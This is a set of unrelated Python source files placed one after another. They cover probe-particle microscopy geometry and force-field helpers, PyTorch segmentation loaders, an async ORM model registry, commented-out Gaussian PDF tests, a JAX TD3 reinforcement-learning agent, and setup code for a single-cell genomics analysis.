    center the geometry inside it.

    Rs is a (3, n) array-like of x/y/z coordinates, modified in place:
    z is always shifted so max(z) == 0; x/y are shifted only if shiftXY.
    The global ``params`` cell entries are updated only when fitCell is True.
    """
    top = max(Rs[2])
    Rs[2] -= top  # put the highest atom at z = 0
    print(" autoGeom substracted zmax = ",top)
    x_lo, x_hi = min(Rs[0]), max(Rs[0])
    y_lo, y_hi = min(Rs[1]), max(Rs[1])
    if fitCell:
        # Orthogonal cell spanning the geometry plus a border on each side.
        params[ 'gridA' ][0] = (x_hi - x_lo) + 2*border
        params[ 'gridA' ][1] = 0
        params[ 'gridB' ][0] = 0
        params[ 'gridB' ][1] = (y_hi - y_lo) + 2*border
        params[ 'scanMin' ][0] = 0
        params[ 'scanMin' ][1] = 0
        params[ 'scanMax' ][0] = params[ 'gridA' ][0]
        params[ 'scanMax' ][1] = params[ 'gridB' ][1]
        print(" autoGeom changed cell to = ", params[ 'scanMax' ])
    if shiftXY:
        # Move the geometry's xy-midpoint onto the cell's midpoint.
        dx = 0.5*( params[ 'gridA' ][0] + params[ 'gridB' ][0] ) - 0.5*(x_lo + x_hi)
        Rs[0] += dx
        dy = 0.5*( params[ 'gridA' ][1] + params[ 'gridB' ][1] ) - 0.5*(y_lo + y_hi)
        Rs[1] += dy
        print(" autoGeom moved geometry by ",dx,dy)
def PBCAtoms( Zs, Rs, Qs, avec, bvec, na=None, nb=None ):
    """
    Replicate sample atoms over -na..na / -nb..nb cell images along the
    avec/bvec lattice vectors (z is left unchanged).

    Used to evaluate the force field with periodic boundary conditions.
    When na/nb are None they default to the global params['nPBC'].
    Returns copies of the multiplied (Zs, Rs, Qs) as numpy arrays.
    """
    na = params['nPBC'][0] if na is None else na
    nb = params['nPBC'][1] if nb is None else nb
    out_Z, out_R, out_Q = [], [], []
    for i in range(-na, na + 1):
        for j in range(-nb, nb + 1):
            for idx in range(len(Zs)):
                base = Rs[idx]
                shifted = (base[0] + i*avec[0] + j*bvec[0],
                           base[1] + i*avec[1] + j*bvec[1],
                           base[2])
                out_Z.append(Zs[idx])
                out_R.append(shifted)
                out_Q.append(Qs[idx])
    return np.array(out_Z).copy(), np.array(out_R).copy(), np.array(out_Q).copy()
def get_C612( i, j, FFparams ):
    """
    Return the Lennard-Jones (C6, C12) coefficients for the atom pair (i, j).

    Uses the Lorentz-Berthelot-style combination: summed rmin radii and the
    geometric mean of the epsilon well depths from FFparams.
    """
    r_sum = FFparams[i][0] + FFparams[j][0]
    e_geom = np.sqrt(FFparams[i][1] * FFparams[j][1])
    return 2 * e_geom * (r_sum ** 6), e_geom * (r_sum ** 12)
def getAtomsLJ( iZprobe, iZs, FFparams ):
    """
    Return arrays (C6, C12) of Lennard-Jones coefficients for the interaction
    between each atom in ``iZs`` and the probe particle ``iZprobe``.

    Atomic numbers are 1-based; FFparams is indexed 0-based, hence the -1.
    """
    probe_idx = int(iZprobe) - 1
    pairs = [get_C612(probe_idx, z - 1, FFparams) for z in iZs]
    C6 = np.array([c6 for c6, _ in pairs], dtype=float)
    C12 = np.array([c12 for _, c12 in pairs], dtype=float)
    return C6, C12
# ============= Hi-Level Macros
def prepareScanGrids( ):
    """
    Build the x/y/z tip-scan grids from params scanMin/scanMax/scanStep.

    The returned lvecScan origin is shifted from scanMin by the probe bond
    vector r0Probe, so the XSF output is referenced to the Probe Particle
    rather than the tip Apex.
    Returns (xTips, yTips, zTips, lvecScan).
    """
    lo = params['scanMin']
    hi = params['scanMax']
    step = params['scanStep']
    r0 = params['r0Probe']
    eps = 0.00001  # tiny slack so the upper bound is included
    xTips = np.arange(lo[0], hi[0] + eps, step[0])
    yTips = np.arange(lo[1], hi[1] + eps, step[1])
    zTips = np.arange(lo[2], hi[2] + eps, step[2])
    extent = (xTips[0], xTips[-1], yTips[0], yTips[-1])
    span = hi - lo
    lvecScan = np.array([
        [(lo + r0)[0],
         (lo + r0)[1],
         (lo - r0)[2]],
        [span[0], 0.0, 0.0],
        [0.0, span[1], 0.0],
        [0.0, 0.0, span[2]],
    ]).copy()
    return xTips, yTips, zTips, lvecScan
def lvec2params( lvec ):
    """Copy lattice-vector rows 1..3 of lvec into the global params cell."""
    for row, key in enumerate(('gridA', 'gridB', 'gridC'), start=1):
        params[key] = lvec[row, :].copy()
def params2lvec( ):
    """Return a fresh 4x3 lattice-vector array [origin, gridA, gridB, gridC]
    assembled from the global params cell vectors."""
    lvec = np.array([
        [0.0, 0.0, 0.0],
        params['gridA'],
        params['gridB'],
        params['gridC'],
    ]).copy()  # bug fix: the original wrote `.copy` (no call) and so
               # returned the bound method object instead of the array
    return lvec
|
import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from .SegmentationDataset import *
def get_loader(img_dir, mask_dir, batch_size):
    """Build a shuffling DataLoader over paired image/mask segmentation data.

    Uses a single worker process; batches are drawn from SegmentationDataset.
    """
    dataset = SegmentationDataset(img_dir, mask_dir)
    return torch.utils.data.DataLoader(
        dataset,
        batch_size=batch_size,
        shuffle=True,
        num_workers=1,
    )
def get_test_loader(img_dir, batch_size):
    """Build a shuffling DataLoader of ToTensor-transformed images read from
    an ImageFolder directory tree (one sub-folder per class)."""
    folder = datasets.ImageFolder(root=img_dir, transform=transforms.ToTensor())
    return torch.utils.data.DataLoader(
        folder,
        batch_size=batch_size,
        shuffle=True,
        num_workers=1,
    )
|
from typing import Dict, List, Optional

from .model import Model
class ModelManager:
    """Registry of named Model instances with bulk create/drop helpers."""

    def __init__(self) -> None:
        # Maps model name -> Model instance.
        self.models: Dict[str, Model] = {}

    def add_model(self, name: str, model: Model):
        """Register *model* under *name* (overwrites any existing entry)."""
        self.models[name] = model

    def remove_model(self, name: str):
        """Unregister the model; raises KeyError if *name* is unknown."""
        del self.models[name]

    def __get_table_name(self, table_obj: Dict[str, str]) -> str:
        """Return the table name from a DB metadata row.

        Supports rows keyed by either 'name' or 'tablename'; raises
        KeyError if neither key is present.
        """
        try:
            return table_obj['name']
        except KeyError:
            return table_obj['tablename']

    async def create_all_tables(self, models_db: Optional[List] = None):
        """Create every registered model's table, then wire relationships.

        Models whose table is absent from *models_db* (existing DB tables)
        get ``associations()``; the rest get ``relationships()``.

        Raises:
            Exception: if no models are registered.
        """
        # Bug fix: the original built this Exception but never raised it,
        # silently doing nothing when no models were registered.
        if not self.models:
            raise Exception(
                "No models found: create your models and set the "
                "model_manager attribute on them.")
        for model in self.models.values():
            await model.create()
        # Mutable-default fix: build the name list from a fresh copy.
        existing = [self.__get_table_name(obj) for obj in (models_db or [])]
        for name, model in self.models.items():
            if name not in existing:
                await model.associations()
            else:
                model.relationships()

    async def drop_all_tables(self):
        """Drop every registered model's table (CASCADE)."""
        for model in self.models.values():
            await model.drop_table(cascade=True)
|
# # coding=utf-8
# """
# test_auxiliary.py
#
# Test auxiliary functions.
# """
# import unittest
# import numpy as np
# import scipy.stats as sps
# from odefilters import auxiliary as aux
#
# np.random.seed(568)
#
#
#
# class TestGaussianPDF(unittest.TestCase):
# """
# Tests gaussian_pdf() function.
# Checks whether it complains about
# wrong inputs returns vectorised evaluations
# and compares output to scipy.stats.
# """
# def setUp(self):
# """
# Set up pointsets, means and covariances
# that 'would work'
# """
# self.ptset_univar = np.random.rand(10)
# self.mean_univar = np.random.rand()
# self.cov_univar = np.random.rand()
#
# self.ptset_multivar = np.random.rand(10, 2)
# self.mean_multivar = np.random.rand(2)
# self.cov_multivar = np.random.rand() * np.eye(2)
#
#
# def test_compare_with_scipystats_univar(self):
# """Check whether the output is the same as for scipy.stats"""
# scs_output = sps.norm.pdf(self.ptset_univar[0],
# self.mean_univar, np.sqrt(self.cov_univar))
# aux_output = aux.gaussian_pdf(self.ptset_univar,
# self.mean_univar, self.cov_univar)[0]
# self.assertAlmostEqual(aux_output, scs_output, places=15)
#
#
# def test_inconsistent_univar(self):
# """
# Make gaussian_pdf() complain about
# wrongly shaped inputs in UNIVARIATE setting.
# """
# self.check_proper_input_univar()
# self.check_only_ptset_proper_univar()
# self.check_only_mean_proper_univar()
# self.check_only_covar_proper_univar()
#
# def check_proper_input_univar(self):
# """
# Everything has the right shape---this should pass.
# """
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_univar)
#
# def check_only_ptset_proper_univar(self):
# """
# Only the pointset has the right shape.
# Recycle 'proper' multivariate inputs as
# wrong univariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_multivar)
#
# def check_only_mean_proper_univar(self):
# """
# Only the mean has the right shape.
# Recycle 'proper' multivariate inputs as
# wrong univariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_multivar)
#
# def check_only_covar_proper_univar(self):
# """
# Only the covariance has the right shape.
# Recycle 'proper' multivariate inputs as
# wrong univariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
#
#
# def test_compare_with_scipystats_multivar(self):
# """
# Check whether the output is the same as for scipy.stats.
# """
# scs_output = sps.multivariate_normal.pdf(self.ptset_multivar[0],
# self.mean_multivar, self.cov_multivar)
# aux_output = aux.gaussian_pdf(self.ptset_multivar,
# self.mean_multivar, self.cov_multivar)[0]
# self.assertAlmostEqual(aux_output, scs_output, places=15)
#
#
# def test_inconsistent_multivar(self):
# """
# Make gaussian_pdf() complain about
# wrongly shaped inputs in MULTIVARIATE setting.
# """
# self.check_proper_input_multivar()
# self.check_only_ptset_proper_multivar()
# self.check_only_mean_proper_multivar()
# self.check_only_covar_proper_multivar()
#
# def check_proper_input_multivar(self):
# """
# Everything has the right shape---this should pass.
# """
# aux.gaussian_pdf(self.ptset_multivar, self.mean_multivar, self.cov_multivar)
#
# def check_only_ptset_proper_multivar(self):
# """
# Only the pointset has the right shape.
# Recycle 'proper' univariate inputs as
# wrong multivariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
#
#
# def check_only_mean_proper_multivar(self):
# """
# Only the mean has the right shape.
# Recycle 'proper' univariate inputs as
# wrong multivariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_univar)
#
# def check_only_covar_proper_multivar(self):
# """
# Only the covar has the right shape.
# Recycle 'proper' univariate inputs as
# wrong multivariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_multivar)
|
# Copyright 2022 Nicolas Perrin-Gilbert.
#
# Licensed under the BSD 3-Clause License.
from abc import ABC
from typing import Any, Tuple, Sequence, Callable
import dataclasses
import flax
from flax import linen
import jax
import jax.numpy as jnp
import optax
from xpag.agents.agent import Agent
import os
import joblib
Params = Any
PRNGKey = jnp.ndarray
@dataclasses.dataclass
class FeedForwardModel:
    """Bundles a network's parameter-init and forward callables (see make_td3_networks)."""
    # Callable mapping a PRNG key to freshly initialized parameters.
    init: Any
    # Callable mapping (params, inputs...) to network outputs.
    apply: Any
@flax.struct.dataclass
class TrainingState:
    """Contains training state for the learner."""
    # Optimizer state and parameters of the policy (actor) network.
    policy_optimizer_state: optax.OptState
    policy_params: Params
    # Slowly-updated policy copy, used for target-action smoothing.
    target_policy_params: Params
    # Optimizer state and parameters of the twin Q (critic) networks.
    q_optimizer_state: optax.OptState
    q_params: Params
    # Slowly-updated critic copy, used for bootstrapped TD targets.
    target_q_params: Params
    # PRNG key threaded through the update steps.
    key: PRNGKey
    # Number of update steps performed so far.
    steps: jnp.ndarray
class TD3(Agent, ABC):
    """Twin Delayed DDPG (TD3) agent implemented with JAX / flax / optax."""

    def __init__(
        self,
        observation_dim,
        action_dim,
        params=None,
    ):
        """
        Jax implementation of TD3 (https://arxiv.org/abs/1802.09477).
        This version assumes that the actions are between -1 and 1 (for all
        dimensions).
        """
        # BUG FIX: params defaults to None but is indexed below ("x in params"),
        # which raised TypeError when the default was used. Treat None as {}.
        if params is None:
            params = {}
        # Hyperparameters, each overridable through the params dict.
        discount = 0.99 if "discount" not in params else params["discount"]
        reward_scale = 1.0 if "reward_scale" not in params else params["reward_scale"]
        policy_lr = 3e-4 if "policy_lr" not in params else params["policy_lr"]
        critic_lr = 3e-4 if "critic_lr" not in params else params["critic_lr"]
        soft_target_tau = (
            0.005 if "soft_target_tau" not in params else params["soft_target_tau"]
        )
        # JAX backend for jit compilation (None lets JAX choose).
        self.backend = None if "backend" not in params else params["backend"]

        class CustomMLP(linen.Module):
            """MLP module with distinct initializers for hidden vs last layer."""

            layer_sizes: Sequence[int]
            activation: Callable[[jnp.ndarray], jnp.ndarray] = linen.relu
            kernel_init_hidden_layer: Callable[
                ..., Any
            ] = jax.nn.initializers.lecun_uniform()
            kernel_init_last_layer: Callable[
                ..., Any
            ] = jax.nn.initializers.lecun_uniform()
            bias_init_hidden_layer: Callable[
                ..., Any
            ] = jax.nn.initializers.lecun_uniform()
            bias_init_last_layer: Callable[
                ..., Any
            ] = jax.nn.initializers.lecun_uniform()
            activate_final: bool = False
            bias: bool = True

            @linen.compact
            def __call__(self, data: jnp.ndarray):
                hidden = data
                for i, hidden_size in enumerate(self.layer_sizes):
                    # Last layer gets its own initializers; hidden layers share theirs.
                    hidden = linen.Dense(
                        hidden_size,
                        name=f"hidden_{i}",
                        kernel_init=self.kernel_init_hidden_layer
                        if (i != len(self.layer_sizes) - 1)
                        else self.kernel_init_last_layer,
                        bias_init=self.bias_init_hidden_layer
                        if (i != len(self.layer_sizes) - 1)
                        else self.bias_init_last_layer,
                        use_bias=self.bias,
                    )(hidden)
                    if i != len(self.layer_sizes) - 1 or self.activate_final:
                        hidden = self.activation(hidden)
                return hidden

        def kernel_init_hidden_layer(key_, shape, dtype=jnp.float_):
            # len(shape) should be 2
            dtype = jax.dtypes.canonicalize_dtype(dtype)
            # Uniform in [-1/sqrt(fan), 1/sqrt(fan)] with fan = max(in, out).
            mval = 1.0 / jnp.sqrt(jnp.maximum(shape[0], shape[1]))
            return jax.random.uniform(key_, shape, dtype, -mval, mval)

        def bias_init_hidden_layer(key_, shape, dtype=jnp.float_):
            # Constant positive bias for hidden layers.
            return 0.1 * jnp.ones(shape, jax.dtypes.canonicalize_dtype(dtype))

        def init_last_layer(key_, shape, dtype=jnp.float_):
            # Small uniform init for the output layer (kernel and bias).
            dtype = jax.dtypes.canonicalize_dtype(dtype)
            mval = 1e-3
            return jax.random.uniform(key_, shape, dtype, -mval, mval)

        def make_td3_networks(
            param_size: int,
            obs_size: int,
            action_size: int,
            hidden_layer_sizes: Tuple[int, ...] = (256, 256),
        ) -> Tuple[FeedForwardModel, FeedForwardModel]:
            """Creates a policy and value networks for TD3."""
            policy_module = CustomMLP(
                layer_sizes=hidden_layer_sizes + (param_size,),
                activation=linen.relu,
                kernel_init_hidden_layer=kernel_init_hidden_layer,
                kernel_init_last_layer=init_last_layer,
                bias_init_hidden_layer=bias_init_hidden_layer,
                bias_init_last_layer=init_last_layer,
            )

            class QModule(linen.Module):
                """Q Module: n_critics independent Q heads (twin critics)."""

                n_critics: int = 2

                @linen.compact
                def __call__(self, obs: jnp.ndarray, actions: jnp.ndarray):
                    hidden = jnp.concatenate([obs, actions], axis=-1)
                    res = []
                    for _ in range(self.n_critics):
                        q = CustomMLP(
                            layer_sizes=hidden_layer_sizes + (1,),
                            activation=linen.relu,
                            kernel_init_hidden_layer=kernel_init_hidden_layer,
                            kernel_init_last_layer=init_last_layer,
                            bias_init_hidden_layer=bias_init_hidden_layer,
                            bias_init_last_layer=init_last_layer,
                        )(hidden)
                        res.append(q)
                    # Shape (..., n_critics): one column per critic head.
                    return jnp.concatenate(res, axis=-1)

            q_module = QModule()
            dummy_obs = jnp.zeros((1, obs_size))
            dummy_action = jnp.zeros((1, action_size))
            policy = FeedForwardModel(
                init=lambda key_: policy_module.init(key_, dummy_obs),
                apply=policy_module.apply,
            )
            value = FeedForwardModel(
                init=lambda key_: q_module.init(key_, dummy_obs, dummy_action),
                apply=q_module.apply,
            )
            return policy, value

        # Snapshot of the constructor arguments (minus self) for write_config().
        self._config_string = str(list(locals().items())[1:])
        super().__init__("TD3", observation_dim, action_dim, params)
        self.discount = discount
        self.reward_scale = reward_scale
        self.soft_target_tau = soft_target_tau
        if "seed" in self.params:
            start_seed = self.params["seed"]
        else:
            start_seed = 42
        self.key, local_key, key_models = jax.random.split(
            jax.random.PRNGKey(start_seed), 3
        )
        self.policy_model, self.value_model = make_td3_networks(
            action_dim, observation_dim, action_dim
        )
        self.policy_optimizer = optax.adam(learning_rate=1.0 * policy_lr)
        self.q_optimizer = optax.adam(learning_rate=1.0 * critic_lr)
        key_policy, key_q = jax.random.split(key_models)
        self.policy_params = self.policy_model.init(key_policy)
        self.policy_optimizer_state = self.policy_optimizer.init(self.policy_params)
        self.q_params = self.value_model.init(key_q)
        self.q_optimizer_state = self.q_optimizer.init(self.q_params)

        def postprocess(x):
            # Squash raw network outputs into the action range [-1, 1].
            return jnp.tanh(x)

        self.postprocess = postprocess

        def actor_loss(
            policy_params: Params, q_params: Params, observations
        ) -> jnp.ndarray:
            """Deterministic policy gradient loss: maximize min of the twin Qs."""
            p_actions = self.policy_model.apply(policy_params, observations)
            p_actions = self.postprocess(p_actions)
            q_action = self.value_model.apply(q_params, observations, p_actions)
            min_q = jnp.min(q_action, axis=-1)
            return -jnp.mean(min_q)

        def critic_loss(
            q_params: Params,
            target_policy_params: Params,
            target_q_params: Params,
            observations,
            actions,
            new_observations,
            rewards,
            mask,
            key_,
        ) -> jnp.ndarray:
            """TD error of both critics against a smoothed, clipped target."""
            next_pre_actions = self.policy_model.apply(
                target_policy_params, new_observations
            )
            new_next_actions = self.postprocess(next_pre_actions)
            # Target-policy smoothing: add clipped noise, then clip to [-1, 1].
            policy_noise = 0.2
            noise_clip = 0.5
            new_next_actions = jnp.clip(
                new_next_actions
                + jnp.clip(
                    policy_noise
                    * jax.random.normal(key_, shape=new_next_actions.shape),
                    -noise_clip,
                    noise_clip,
                ),
                -1.0,
                1.0,
            )
            q_old_action = self.value_model.apply(q_params, observations, actions)
            next_q = self.value_model.apply(
                target_q_params, new_observations, new_next_actions
            )
            # Clipped double-Q: bootstrap from the smaller of the twin targets.
            next_v = jnp.min(next_q, axis=-1)
            target_q = jax.lax.stop_gradient(
                rewards * self.reward_scale
                + mask * discount * jnp.expand_dims(next_v, -1)
            )
            q_error = q_old_action - target_q
            q_loss = 2.0 * jnp.mean(jnp.square(q_error))
            return q_loss

        self.critic_grad = jax.value_and_grad(critic_loss)
        self.actor_grad = jax.value_and_grad(actor_loss)

        def update_step(
            state: TrainingState, observations, actions, rewards, new_observations, mask
        ) -> Tuple[TrainingState, dict]:
            """One gradient step on actor and critics plus Polyak target updates."""
            key, key_critic = jax.random.split(state.key, 2)
            actor_l, actor_grads = self.actor_grad(
                state.policy_params, state.target_q_params, observations
            )
            policy_params_update, policy_optimizer_state = self.policy_optimizer.update(
                actor_grads, state.policy_optimizer_state
            )
            policy_params = optax.apply_updates(
                state.policy_params, policy_params_update
            )
            critic_l, critic_grads = self.critic_grad(
                state.q_params,
                state.target_policy_params,
                state.target_q_params,
                observations,
                actions,
                new_observations,
                rewards,
                mask,
                key_critic,
            )
            q_params_update, q_optimizer_state = self.q_optimizer.update(
                critic_grads, state.q_optimizer_state
            )
            q_params = optax.apply_updates(state.q_params, q_params_update)
            # Polyak averaging of target networks.
            # NOTE(review): jax.tree_multimap is deprecated/removed in newer JAX
            # (use jax.tree_util.tree_map); left as-is for the pinned JAX version.
            new_target_q_params = jax.tree_multimap(
                lambda x, y: x * (1 - soft_target_tau) + y * soft_target_tau,
                state.target_q_params,
                q_params,
            )
            new_target_policy_params = jax.tree_multimap(
                lambda x, y: x * (1 - soft_target_tau) + y * soft_target_tau,
                state.target_policy_params,
                policy_params,
            )
            new_state = TrainingState(
                policy_optimizer_state=policy_optimizer_state,
                policy_params=policy_params,
                target_policy_params=new_target_policy_params,
                q_optimizer_state=q_optimizer_state,
                q_params=q_params,
                target_q_params=new_target_q_params,
                key=key,
                steps=state.steps + 1,
            )
            metrics = {}
            return new_state, metrics

        self.update_step = jax.jit(update_step, backend=self.backend)

        def select_action_probabilistic(observation, policy_params, key_):
            # Exploration: Gaussian noise on the squashed action, clipped to [-1, 1].
            pre_action = self.policy_model.apply(policy_params, observation)
            pre_action = self.postprocess(pre_action)
            expl_noise = 0.1
            return jnp.clip(
                pre_action
                + expl_noise * jax.random.normal(key_, shape=pre_action.shape),
                -1.0,
                1.0,
            )

        def select_action_deterministic(observation, policy_params, key_=None):
            # Greedy action (no exploration noise); key_ is ignored.
            pre_action = self.policy_model.apply(policy_params, observation)
            return self.postprocess(pre_action)

        self.select_action_probabilistic = jax.jit(
            select_action_probabilistic, backend=self.backend
        )
        self.select_action_deterministic = jax.jit(
            select_action_deterministic, backend=self.backend
        )

        def q_value(observation, action, q_params):
            # Conservative value estimate: min over the twin critics.
            q_action = self.value_model.apply(q_params, observation, action)
            min_q = jnp.min(q_action, axis=-1)
            return min_q

        self.q_value = jax.jit(q_value, backend=self.backend)
        self.training_state = TrainingState(
            policy_optimizer_state=self.policy_optimizer_state,
            policy_params=self.policy_params,
            target_policy_params=self.policy_params,
            q_optimizer_state=self.q_optimizer_state,
            q_params=self.q_params,
            target_q_params=self.q_params,
            key=local_key,
            steps=jnp.zeros((1,)),
        )

    def value(self, observation, action):
        """Return min-of-twin-critics Q(observation, action) under current params."""
        return self.q_value(
            observation,
            action,
            self.training_state.q_params,
        )

    def select_action(self, observation, eval_mode=False):
        """Select an action; noisy during training, deterministic in eval mode."""
        self.key, key_sample = jax.random.split(self.key)
        if eval_mode:
            apply_func = self.select_action_deterministic
        else:
            apply_func = self.select_action_probabilistic
        action = apply_func(observation, self.training_state.policy_params, key_sample)
        # Always return a batched action (adds a leading axis for single inputs).
        if len(action.shape) == 1:
            return jnp.expand_dims(action, axis=0)
        else:
            return action

    def save(self, directory):
        """Serialize each field of the training state to <directory>/<field>.joblib."""
        os.makedirs(directory, exist_ok=True)
        for filename in self.training_state.__dict__.keys():
            with open(os.path.join(directory, filename + ".joblib"), "wb") as f_:
                joblib.dump(self.training_state.__dict__[filename], f_)

    def load(self, directory):
        """Restore a training state previously written by save()."""
        load_all = {}
        for filename in self.training_state.__dict__.keys():
            # Convert loaded leaves back to jnp arrays.
            load_all[filename] = jax.tree_util.tree_multimap(
                jnp.array, joblib.load(os.path.join(directory, filename + ".joblib"))
            )
        self.training_state = TrainingState(
            policy_optimizer_state=load_all["policy_optimizer_state"],
            policy_params=load_all["policy_params"],
            target_policy_params=load_all["target_policy_params"],
            q_optimizer_state=load_all["q_optimizer_state"],
            q_params=load_all["q_params"],
            target_q_params=load_all["target_q_params"],
            key=load_all["key"],
            steps=load_all["steps"],
        )

    def write_config(self, output_file: str):
        # NOTE(review): despite the str annotation, output_file must be a
        # writable file object (it is passed to print(file=...)).
        print(self._config_string, file=output_file)

    def train_on_batch(self, batch):
        """Run one update_step on a replay batch and return its metrics dict."""
        observations = batch["observation"]
        actions = batch["action"]
        rewards = batch["reward"]
        new_observations = batch["next_observation"]
        # mask is 0 only for true terminal transitions (done and not truncated).
        mask = 1 - batch["done"] * (1 - batch["truncation"])
        self.training_state, metrics = self.update_step(
            self.training_state, observations, actions, rewards, new_observations, mask
        )
        return metrics
|
#!/usr/bin/env python
import pandas as pd
import datetime
from scipy import sparse
import scipy.io
from scipy.stats import zscore, wilcoxon, spearmanr
from sklearn.preprocessing import binarize, normalize
from sklearn import metrics
from itertools import cycle
import os
import pickle
import seaborn as sns
import subprocess
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import sys
import re
import math
import datetime
from scipy.spatial import distance
from scipy.cluster import hierarchy
import scanpy as sc
from itertools import combinations
from functools import reduce
from scipy.cluster.hierarchy import linkage
import scipy.spatial.distance as ssd
from matplotlib import cm
# Marker-gene list sizes evaluated throughout the analysis.
GENE_SIZES = [10, 50, 100, 200, 500, 1000]
SET = 5
# Matplotlib marker shapes for marker sets (M) and per-dataset (U) plots.
MSHAPES = ['o', 'P', 's', 's', '.', '^', '^', '^', '^', '^', '^']
USHAPES = ['o', 'P', 's', 's', '.', 'v', '^', '>', '<', 'D', 'd']
# When False, the last dataset (GSE1303990) is dropped from every list below.
ALL_DATA = True
# Pickled scanpy objects per feature type, one file per GSE dataset.
SCANPY_OBJS = {'gene': ['GSE100033_gene_id_order_gene__all_bin_scanpy_obj_with_feat.pyn', 'GSE111586_gene_id_order_gene__all_scanpy_obj.pyn', 'GSE123576_gene_id_order_gene__all_scanpy_obj.pyn', 'GSE126074_gene_id_order_gene__all_scanpy_obj.pyn', 'GSE127257_distal_id_gene_order__all_scanpy_obj.pyn', 'GSE1303990_gene_id_order_gene__all_scanpy_obj.pyn', 'BICCN2_gene_id_order_gene__all_scanpy_obj.pyn'],
               'distal': ['GSE100033_distal_id_order_distal__all_bin_scanpy_obj_with_feat.pyn', 'GSE111586_distal_id_order_distal__all_scanpy_obj.pyn', 'GSE123576_distal_id_order_distal__all_scanpy_obj.pyn', 'GSE126074_distal_id_order_distal__all_scanpy_obj.pyn', 'GSE127257_distal_id_gene_order__all_scanpy_obj.pyn', 'GSE1303990_distal_id_order_distal__all_scanpy_obj.pyn', 'BICCN2_distal_id_order_distal__all_scanpy_obj.pyn'],
               'proximal': ['GSE100033_proximal_id_proximal__all_bin_scanpy_obj_with_feat.pyn', 'GSE111586_proximal_id_order_proximal__all_scanpy_obj.pyn', 'GSE123576_proximal_id_order_proximal__all_scanpy_obj.pyn', 'GSE126074_proximal_id_order_proximal__all_scanpy_obj.pyn', 'GSE127257_distal_id_gene_order__all_scanpy_obj.pyn', 'GSE1303990_proximal_id_order_proximal__all_scanpy_obj.pyn', 'BICCN2_proximal_id_order_proximal__all_scanpy_obj.pyn']}
GSES = ['GSE100033', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303990']
if not ALL_DATA:
    # Drop the last dataset and its plot shapes.
    GSES = GSES[0:-1]
    MSHAPES = MSHAPES[0:-1]
    USHAPES = USHAPES[0:-1]
    # Marker-set labels: P* excludes 'SC', A* includes it; dataset names follow.
    PMARKER = ['SF', 'CU', 'TA', 'TN', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257']
    AMARKER = ['SF', 'CU', 'TA', 'TN', 'SC', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257']
else:
    PMARKER = ['SF', 'CU', 'TA', 'TN', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303990']
    AMARKER = ['SF', 'CU', 'TA', 'TN', 'SC', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303990']
def get_palette_shape(size, data=False):
    """Return (palette, line-shape list) for *size* series.

    Colored accents come first (solid lines '-'), followed by a reversed
    'Greys' ramp (dashed '--') for the reference datasets. With data=True only
    the single red accent is used. The grey count follows the ALL_DATA flag.
    """
    global ALL_DATA
    print(size)
    n_greys = 6 if ALL_DATA else 5
    greys = sns.color_palette('Greys', n_greys)[::-1]
    if data:
        accents = ['#E64B35FF']
    else:
        if not ALL_DATA:
            assert size <= 10
        # The fifth accent color is only used at the full series count.
        full_size = 11 if ALL_DATA else 10
        accents = ['#E64B35FF', '#4DBBD5FF', '#00A087FF', '#91D1C2FF']
        if size == full_size:
            accents = accents + ['#3C5488FF']
    palette = accents + greys
    shape = ['-'] * len(accents) + ['--'] * n_greys
    return palette, shape
def norm_row_columns(X):
    """Min-max scale each column of X to [0, 1], then each row of the result.

    Pure-numpy equivalent of the previous per-axis sklearn MinMaxScaler
    application (which also created an unused scaler): constant slices are
    mapped to 0, matching sklearn's zero-range handling (range treated as 1).
    Returns a float ndarray of the same shape.
    """
    def _minmax(v):
        lo = v.min()
        rng = v.max() - lo
        if rng == 0:
            rng = 1.0  # matches sklearn's handle_zeros_in_scale behavior
        return (v - lo) / rng

    X = np.array(X, dtype=float)
    print(X.shape)
    X = np.apply_along_axis(_minmax, 0, X)  # scale each column
    X = np.apply_along_axis(_minmax, 1, X)  # then each row
    print(X.shape)
    # X = normalize(X, norm='l2', axis=0)
    # X = normalize(X, norm='l2', axis=1)
    return X
